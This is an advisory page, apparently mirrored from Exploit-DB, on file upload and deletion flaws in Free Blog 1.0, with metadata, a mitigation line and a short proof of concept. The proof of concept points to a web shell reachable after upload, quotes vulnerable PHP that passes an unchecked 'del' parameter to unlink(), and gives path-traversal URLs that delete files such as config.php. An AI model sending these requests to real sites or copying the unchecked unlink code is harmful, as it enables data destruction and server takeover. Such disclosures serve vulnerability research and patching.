Free Blog 1.0 Multiple Vulnerability

vendor:

Free Blog

by:

cr4wl3r

8,8

CVSS

HIGH

Arbitrary File Upload and Deletion Vulnerability

264

CWE

Product Name: Free Blog

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: blog.sdnex.com

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 12.04.1 LTS

2013

Free Blog 1.0 Multiple Vulnerability

The Free Blog 1.0 application is vulnerable to arbitrary file upload and deletion. An attacker can upload a malicious file to the server and execute it. The attacker can also delete any file from the server.

Mitigation:

The application should be configured to only allow uploads of specific file types and should also be configured to only allow uploads to specific directories.

Source

Exploit-DB raw data:

# Free Blog 1.0 Multiple Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Free_Blog.txt
# Software Link: http://blog.sdnex.com/
# Tested: Ubuntu 12.04.1 LTS

Proof of concept:

Arbitrary File Upload Vulnerability

   http://bastardlabs/blog_path/up.php

Shell will be available here

   http://bastardlabs/blog_path/log/images/shell.php



Arbitrary File Deletion Vulnerability

----------
49 <?php
50 if($_GET['del']){ 
51 $id=$_GET['del'];
52 unlink("./log/images/$id");
53 }
54 ?>
----------

   http://bastardlabs/blog_path/up.php?del=../../[file]
   http://bastardlabs/blog_path/up.php?del=../../config.php

------------------------------
My sweetheart
http://www.photoshow.com/watch/rx9IX5ZS